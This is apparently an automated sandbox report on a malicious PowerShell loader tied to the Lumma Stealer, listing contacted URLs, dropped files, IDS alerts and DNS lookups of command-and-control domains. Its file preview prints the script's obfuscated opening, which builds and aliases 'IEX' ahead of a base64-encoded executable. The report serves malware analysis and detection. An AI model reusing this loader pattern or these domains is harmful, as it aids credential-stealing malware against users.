http://store.steampowered.com/subscriber_agreement/	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://recaptcha.net/recaptcha/;	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.youtube.com	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://medal.tv	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://broadcast.st.dl.eccdnx.com	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://oneget.orgX	powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://s.ytimg.com;	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://login.steampowered.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2090622151.000001BF22481000.00000004.00000800.00020000.00000000.sdmp	false	high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://store.steampowered.com/legal/	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://community.fastly.steamstatic.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://steam.tv/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000000.00000002.2090622151.000001BF2362D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://store.steampowered.com/privacy_agreement/	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://steamcommunity.com/h	RegSvcs.exe, 00000003.00000002.2109016841.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://recaptcha.net	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://store.steampowered.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://steamcommunity.com	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://sketchfab.com	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://lv.queniujq.cn	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.youtube.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://127.0.0.1:27060	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com/recaptcha/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://checkout.steampowered.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://help.steampowered.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.steampowered.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://store.steampowered.com/account/cookiepreferences/	RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2090622151.000001BF22481000.00000004.00000800.00020000.00000000.sdmp	false	high
https://steamcommunity.com/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://store.steampowered.com/;	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589115
Start date and time:	2025-01-11 10:02:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	176.113.115.170_3.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@4/5@10/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 84% Number of executed functions: 19 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .ps1 Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target powershell.exe, PID 6968 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:03:00	API Interceptor	7x Sleep call for process: powershell.exe modified
04:03:01	API Interceptor	4x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	Message 2.eml	Get hash	malicious	Unknown	Browse	104.102.34.105

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.102.49.254

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulDm0ll//Z:NllU6cl/
MD5:	DA1F22117B9766A1F0220503765A5BA5
SHA1:	D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256:	BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512:	520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................R..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjmy13bq.q3t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxoq33oo.abw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.701025630735249
Encrypted:	false
SSDEEP:	48:4Qut3fCsbU2K+UGukvhkvklCyw5n2YwofNlzESogZo84wofNl4JESogZoY1:sFfCRoukvhkvCCtFwofNHHywofN2nH3
MD5:	EC725E1FF09C3989D60AD51AEA892A49
SHA1:	174E15BDED54C7C5180FBED59619CFBADF6853C6
SHA-256:	C493436878F08601F651C95DB80F73E23CC42FBD4B1A18EE8589E4B0C6F49E13
SHA-512:	6674F4AB5DEDFA792D8A50F227A1628756ADDE098E87DE4FE4415D4FA7858E38542312F9FAA0FDD6B433CB81062387C4F6417374682FEE24868519ECA8CE3317
Malicious:	false
Preview:	...................................FL..................F.".. ...d......2bQ..d..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M..........d...td..d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl+ZWH....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....+ZZH..Roaming.@......DWSl+ZZH....C.....................6.,.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl+ZWH....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl+ZWH....E.....................<...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl+ZWH....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl+ZWH....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl+Z`H....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OH3N2M3RR0S467KQRNFP.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.701025630735249
Encrypted:	false
SSDEEP:	48:4Qut3fCsbU2K+UGukvhkvklCyw5n2YwofNlzESogZo84wofNl4JESogZoY1:sFfCRoukvhkvCCtFwofNHHywofN2nH3
MD5:	EC725E1FF09C3989D60AD51AEA892A49
SHA1:	174E15BDED54C7C5180FBED59619CFBADF6853C6
SHA-256:	C493436878F08601F651C95DB80F73E23CC42FBD4B1A18EE8589E4B0C6F49E13
SHA-512:	6674F4AB5DEDFA792D8A50F227A1628756ADDE098E87DE4FE4415D4FA7858E38542312F9FAA0FDD6B433CB81062387C4F6417374682FEE24868519ECA8CE3317
Malicious:	false
Preview:	...................................FL..................F.".. ...d......2bQ..d..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M..........d...td..d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl+ZWH....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....+ZZH..Roaming.@......DWSl+ZZH....C.....................6.,.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl+ZWH....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl+ZWH....E.....................<...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl+ZWH....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl+ZWH....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl+Z`H....q...........

Static File Info

General

File type:	ASCII text, with very long lines (65478), with CRLF line terminators
Entropy (8bit):	5.493891771547605
TrID:
File name:	176.113.115.170_3.ps1
File size:	536'445 bytes
MD5:	2b86583f91a5b84aff4a7232d2a27589
SHA1:	c83c47d772cf4a47389586fe3ab5a14ef4a314e4
SHA256:	83ce3aad9b82d298ec9cd2ad4fc09a807f6416856d1b271a001739ff1639bd4a
SHA512:	304c94cc56aa5f34ed677329389316652b0e82f4b94bd66f3f9668451ec8a2c9b4511ec61110c98e7d43ffc7d4ed3966078ed4b0ccc00bee019f04febfb53fbb
SSDEEP:	12288:srSL64ufv5jhXTrgeFK7wunn/CYv/u0KFwg7:1LRupdXoe7Yv/6Fwg7
TLSH:	5EB47D3141033C6E3B9B2EDEA4006DC10C987997BB54D150AE899276B2BE13B5F6D9FC
File Content Preview:	.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAA

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T10:03:02.179488+0100	2059120	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (letterdrive .shop)	1	192.168.2.5	50683	1.1.1.1	53	UDP
2025-01-11T10:03:02.196518+0100	2059051	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)	1	192.168.2.5	49709	1.1.1.1	53	UDP
2025-01-11T10:03:02.208511+0100	2059041	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)	1	192.168.2.5	59870	1.1.1.1	53	UDP
2025-01-11T10:03:02.296165+0100	2059035	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)	1	192.168.2.5	59260	1.1.1.1	53	UDP
2025-01-11T10:03:02.306956+0100	2059039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)	1	192.168.2.5	53253	1.1.1.1	53	UDP
2025-01-11T10:03:02.322082+0100	2059057	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)	1	192.168.2.5	62283	1.1.1.1	53	UDP
2025-01-11T10:03:02.337113+0100	2059037	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)	1	192.168.2.5	50072	1.1.1.1	53	UDP
2025-01-11T10:03:02.404561+0100	2059043	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)	1	192.168.2.5	56988	1.1.1.1	53	UDP
2025-01-11T10:03:02.414338+0100	2059049	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)	1	192.168.2.5	49978	1.1.1.1	53	UDP
2025-01-11T10:03:03.074242+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.102.49.254	443	TCP
2025-01-11T10:03:03.618250+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49704	104.102.49.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 10:03:02.438077927 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:02.438123941 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:02.438196898 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:02.439543009 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:02.439559937 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.074172020 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.074242115 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.078114986 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.078129053 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.078397036 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.118426085 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.134098053 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.175364971 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618283033 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618305922 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618345976 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618371964 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618396044 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618473053 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.618496895 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.618515015 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.618551970 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.708026886 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.708100080 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.708118916 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.708161116 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.716295004 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.716315031 CET	443	49704	104.102.49.254	192.168.2.5
Jan 11, 2025 10:03:03.716330051 CET	49704	443	192.168.2.5	104.102.49.254
Jan 11, 2025 10:03:03.716336966 CET	443	49704	104.102.49.254	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 10:03:02.179487944 CET	50683	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.188616991 CET	53	50683	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.196517944 CET	49709	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.205411911 CET	53	49709	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.208511114 CET	59870	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.293804884 CET	53	59870	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.296164989 CET	59260	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.305119991 CET	53	59260	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.306956053 CET	53253	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.318020105 CET	53	53253	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.322082043 CET	62283	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.330696106 CET	53	62283	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.337112904 CET	50072	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.401830912 CET	53	50072	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.404561043 CET	56988	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.413100004 CET	53	56988	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.414338112 CET	49978	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.424712896 CET	53	49978	1.1.1.1	192.168.2.5
Jan 11, 2025 10:03:02.425988913 CET	49444	53	192.168.2.5	1.1.1.1
Jan 11, 2025 10:03:02.432813883 CET	53	49444	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 10:03:02.179487944 CET	192.168.2.5	1.1.1.1	0x890f	Standard query (0)	letterdrive.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.196517944 CET	192.168.2.5	1.1.1.1	0x4325	Standard query (0)	soundtappysk.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.208511114 CET	192.168.2.5	1.1.1.1	0x4a95	Standard query (0)	femalsabler.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.296164989 CET	192.168.2.5	1.1.1.1	0x1e2	Standard query (0)	apporholis.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.306956053 CET	192.168.2.5	1.1.1.1	0xf25d	Standard query (0)	crowdwarek.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.322082043 CET	192.168.2.5	1.1.1.1	0x6f9a	Standard query (0)	versersleep.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.337112904 CET	192.168.2.5	1.1.1.1	0x3157	Standard query (0)	chipdonkeruz.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.404561043 CET	192.168.2.5	1.1.1.1	0xd4d6	Standard query (0)	handscreamny.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.414338112 CET	192.168.2.5	1.1.1.1	0xc644	Standard query (0)	robinsharez.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.425988913 CET	192.168.2.5	1.1.1.1	0xec33	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 10:03:02.188616991 CET	1.1.1.1	192.168.2.5	0x890f	Name error (3)	letterdrive.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.205411911 CET	1.1.1.1	192.168.2.5	0x4325	Name error (3)	soundtappysk.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.293804884 CET	1.1.1.1	192.168.2.5	0x4a95	Name error (3)	femalsabler.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.305119991 CET	1.1.1.1	192.168.2.5	0x1e2	Name error (3)	apporholis.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 10:03:02.318020105 CET	1.1.1.1	192.168.2.5	0xf25d	Name error (3)	crowdwarek.shop	none	none	A (IP address)	IN (0x0001)	false
